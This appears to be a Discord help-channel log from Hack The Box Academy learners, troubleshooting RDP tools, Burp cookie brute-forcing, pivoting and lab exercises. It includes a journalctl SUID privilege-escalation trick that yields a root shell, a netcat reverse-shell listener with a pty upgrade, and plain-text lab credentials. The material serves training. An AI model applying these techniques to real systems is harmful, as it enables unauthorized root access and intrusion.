Reading state information... Done
Package freerdp is a virtual package provided by:
freerdp3-x11 3.5.1+dfsg1-5~bpo12+1
freerdp3-shadow-x11 3.5.1+dfsg1-5~bpo12+1
freerdp2-x11 2.10.0+dfsg1-1
freerdp2-shadow-x11 2.10.0+dfsg1-1
You should explicitly select one to install.
E: Package 'freerdp' has no installation candidate
to do the windows fundamentals i need to install xfreerdp on my parrot os, is there one i should get for the module
sudo apt install aptitude
sudo aptitude install freerdp2-x11
might be smarter to do freerdp3-x11
but freerdp2 is the previous stable version
yes aptitude is different from apt
i just want what is needed to complete the lesson.
either one is fine
there's also rdesktop, or remmina
remmina or reminna has a GUI you can use instead of CLI
the course is wanting me to use this package
i forget the spelling
it's being showcased because it's the most common rdp tool for linux
ok so you're stating it does not matter how i gain remote access to the target. everything will work fine in the vpn
yep
rdp is rdp
¯\_(ツ)_/¯
but the commands i gave you will install freerdp to be able to use xfreerdp
as stated by the error, part of the issue was you not specifying which freerdp you're referring to
@vague dust that lucky.php was fiddly but not too bad
Lol the RNG gods smiled upon you
haha had to repeat it loads of times but got it eventually
correct just didnt know if there were differences in rdp
it's not a difference in rdp
it's a difference in package name
you should explicitly select one to install
but freerdp has always had issues installing with apt; so installing aptitude and installing via that tool works fine
Hoii
can someone help me with the Introduction To Splunk & SPL module?
@fathom pendant its failing i can not rdp into target
it's failing
very useful
you're missing something from the password
i also deleted the vpn download. downloaded a vpn, made a new connection just to make sure
jeez
also a tip with xfreerdp; /dynamic-resolution and /cert-ignore
dynamic-resolution lets you resize
ok that tip means nothing
and /cert-ignore well. ignores the cert error you see
Wow.
it means everything 
guys where to start with chemistry box
$xfreerdp /v:10.129.26.16 /u:htb-student /p:Academy_winFun!
[08:17:39:506] [44761:44762] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[08:17:39:506] [44761:44762] [ERROR][com.freerdp.core] - failed to connect to 10.129.26.16
@fathom pendant
I had the same issues using xfreerdp, I couldnt solve even with the additional options so I just used the website machine
reset your vm and try reconnecting
its not a vm. its my os
This is all over the place lol
then just restart your machine
I tried solving the errors and I was not getting any results, use the website vm if you can
¯\_(ツ)_/¯
ok i will reboot
i've had very little issues with xfreerdp
also try putting the password in singlequotes (or at least get in the habit of that)
I'm having rdp problems in the AD attack modules, never had problems before
but the vm works, so I use the vm
I use xfreerdp /u:eagle\htb-student /p:Academy_winFun! /v:10.129.26.16
you shouldn't need to specify the Domain
Oh. Well it's worked for me since lol
hiii
as long as the domain is eagle, sure
but there's also other tools like rdesktop and remmina
iirc remmina is installed on parrot by default
if you want to talk about random stuff go to #general <--
I use the rdesktop when im logged into the target when it's windows lol
ok how do i install this one. i am over freerdp
sudo apt install rdesktop; should be there by default iirc on parrot
no man came up
Control remote Windows 10 desktops through RDP connections using rdesktop in Linux .
thank you
I think it's naptime
Hiii,
I've got a problem with the skill assessment of the wi-fi penetration testing basics.
It seems that I'm not able to see a lot of frames from the access point HTB.
I need to capture the EAPOL to actually crack the passphrase.
Does anyone have an idea of where the problem could come from?
@vague dust how do you get burp to brute force the last character of the cookie AND THEN encode the whole payload again
For the third question on https://academy.hackthebox.com/module/110/section/1055
add prefix
oh lawd i havent done that in a hot minute
it's in the payload options of intruder
and encoding you just do in reverse of how you decoded
@fathom pendant ok target window opens. then crashes
decode order: md5 --> b64 --> ascii
encode order: ascii --> b64 --> md5
i'm not staff or support
Need some help? Learn how to reach the support team on Academy.
ok. youve helped alot thank you
I wish you could read the modules on your phone
D: getting errors with burp and ZAP now where it can't find the site, but outside of the apps it can
Oh....is it on the web page lol
delays delays hehe
in the app settings of your mobile browser
for chrome it's 3 dots then scroll a bit in that menu
Ah gotcha. I'll just do that then thank you
i just use foxyproxy instead of the in-app browser
yeah i might do that instead
you won't be able to use pwnbox or anything mind you
nice to avoid sending all browser traffic to proxy tho haha
ah its working now, needed a reboot for some reason
I didn't intend to. I'm on the networking module and that requires some reading. Thank you for the heads up
networking module is basic networking 101 stuff with some light maths involved
its the note taking that slows me down too i think
slow isn't bad
the AD one is 💀 a lot
true but trying to get CPTS done before the promotion cycle
¯\_(ツ)_/¯
in feb, could mean an extra 30k
don't beat yourself up if you don't get it
@fathom pendant issue was resolved by full system shutdown. fyi
Yeah don't burn yourself up. I did that to myself doing the bug bounty oath
A reset you say?
iirc that was one of my first suggestions
Thanks got it, prefix then encode twice, i couldn't get my head around putting the wordlist in and putting the original cookie in and then encoding both again
i wasn't giving the exact order
ah ok
just an example
no worries, thanks again Marcielee
But you learned!
Did you refresh the page?
mine too
it rolled over to the new week
the timer is set in UTC
so when will it show the real number, it should be around 30
when you pay me $1000
aha
likely some backend bug
Only 1k?
results not guaranteed
Does anyone have the built in browser functionality for ZAP working correctly on a Debian based distro? As far as I can tell my selenium, geckodriver and firefox versions are compatible but I keep getting the 'the provided browser was not found error' when i try to launch firefox from ZAP.
unfortunately i have the same issue with chrome as well. starting firefox outside of zap, turning on foxyproxy , etc. works though. This just seems like something that should work considering mozilla sponsors the tool.
https://gtfobins.github.io/gtfobins/journalctl/
i can't get this to work
from Permission Management, Linux Fundamentals
"If the administrator sets the SUID bit to "journalctl," any user with access to this application could execute a shell as root. More information about this and other such applications can be found at GTFObins."
what are you trying to get working?
there's no questions or anything for this section
make sure journalctl has the proper (in this case improper) perms
SUID bit has to be set on journalctl.
managing to open a shell via journalctl, that's the risk
Doesn't mean that risk is gonna exist, especially on the pwnbox
so chmod u+s /usr/bin/journalctl
because the suid bit is not set?
Bingo
@waxen totem @dark hedge @fathom pendant didn't work
o wait I'm high
Just ./journalctl.sh
On your script
permission denied
Does it have the execution bit enabled?
no mb
Also you're misinterpreting what gtfobins is saying
Just run journalctl, then do !/bin/sh
i tried that tho
but before i added the s bit
doesn't work, I can't write the ! at the start
yea there's too much to learn,
i think the problem is i can't open a command
when i write /bin/sh it tried to match with logs
!/bin/sh one line
In most things ! tells the program to run a local system command instead of internal command
someone here who can help me with last question kerberos Attacks Skill Assessment?
just tried it, can confirm, it's weird,
it's unlikely to run into anyway ¯\_(ツ)_/¯
You'd need to ask the question first, without any spoiler about the exercise
What's the content of the file: \\DC01\Secret Share\flag.txt?
you finished it already?
You'll have to find that out....
I haven't done the Kerberos Attacks modules but someone might have
cant share answers on the modules folks 🙂
did you finish it?^^
finish what? im not up to speed on this channel since it is very active >_>
if someone here can help me out with the Kerberos Attacks Skill Assessment on the last question just hit me up pls 😄
what module is it?
The Kerberos Attacks module. They want to know the contents of the flag.txt file
oooooooh. i dont even have that module unlocked lol
I'm working on the Conditional Execution module for the "Introduction to Bash Scripting" section and I am running into a wall answering the question. I've looked around and I seem to be getting the same answer other people are, but they're also saying it isn't working.
Question: "Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints you the number of characters of the 35th generated value of the variable "var". Submit the number as the answer."
#!/bin/bash

# Count number of characters in a variable:
# echo "$variable" | wc -c

# Variable to encode
var="nef892na9s1p9asn2aJs71nIsm"

for counter in {1..40}
do
    # base64-encode the previous value and print its length
    var=$(echo "$var" | base64)
    echo -e "${#var}"
done
Its been a long time since I've done bash coding, so had to knock some rust off. I prefer Python
handle what? the suspension? how
You can handle the suspended process afterwards
most common use case for this is when you're spawning an interactive shell:
(kali)$ nc -lvnp 1337
connection from 10.10.10.10
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data$
ctrl+z
(kali)$ stty raw -echo; fg
www-data$ export TERM=xterm
ctrl+z suspends the shell so you can change your terminal settings for a better shell experience, fg puts it back into use
jobs to see what's suspended
wow im actually interested in this networking module...weird
Hello can someone help me
i tried both and xfreerdp gives a black screen and rdesktop says the credentials are wrong, also changed the vpn of PWNbox and all the same
xfreerdp /v:<ip> /u:htb-student /p:Academy_student_AD!
rdesktop -u htb-student -p Academy_student_AD! <ip>
are there any error messages when you xfreerdp?
in xfreerdp on the black screen press space.
wow
it worked
i get it that's for the blue screen before login , thank you @vague dust @cloud urchin
I'm having some trouble with my kali VM. It won't resolve an internet connection, and the only thing listed when I run ifconfig is the local host. Anyone have any tips?
bro, install vmtools again maybe it will help.
Dumb question, but just to clarify: you mean install it onto the host machine right?
make sure in your hypervisor you actually gave it a NIC
Mine looks like yours, it's a NAT
just try to install vmtools again.
or by going in virtual network editor just click on default setting.
Any ideas how this could have happened? The only changes I've made to the settings were to give it more memory (that was earlier today). Other than that, I haven't changed them for several months.
gremlins
I have three children. You might actually be more right than you realize.
Module: Pivoting, Tunneling, and Port Forwarding
Section: Remote/Reverse Port Forwarding with SSH
- Have done the SSH with Dynamic port forwarding successfully but when i do a Host scan it shows me that all hosts are already up, have tried -Pn or -sS scans also.
It's explained in the 'dynamic port forwarding with ssh and socks tunneling' section
you can only perform full TCP connect scans over proxychains
Hi guys, AD enumeration skill assessment.
I can't get chisel reverse tunnel to get back to my attacker host.
the --reverse flag should do it, but I don't get where the issue lies..
The pivot is the machine on ip 172.16.6.100, and this internal network is on 172.16.6.50
a better overview of whats happening:
Aren’t you connecting to the .50 machine in the screenshot on the bottom right?
Ping often doesn’t work on windows machines so don’t rely on that
what does the last line of /etc/proxychains4.conf say?
should say socks5 127.0.0.1 1080
yeah, says the same
the proxychains connects me to the internal network
so its not the issue I assume
I wasn't able to Invoke-WebRequest too
The pivot (172.16.6.100) is giving my attacker host (10.10.16.6) access to the internal machine(172.16.6.50).
Using the --reverse flag on Chisel should let the internal machine access my attacker host, or am I wrong?
looks like it's working to me
the pivot grants your host machine access to the private subnet that's normally not accessible to you
thanks man, i just forgot about it
the end machine can't just connect to your machine, it has no route to your machine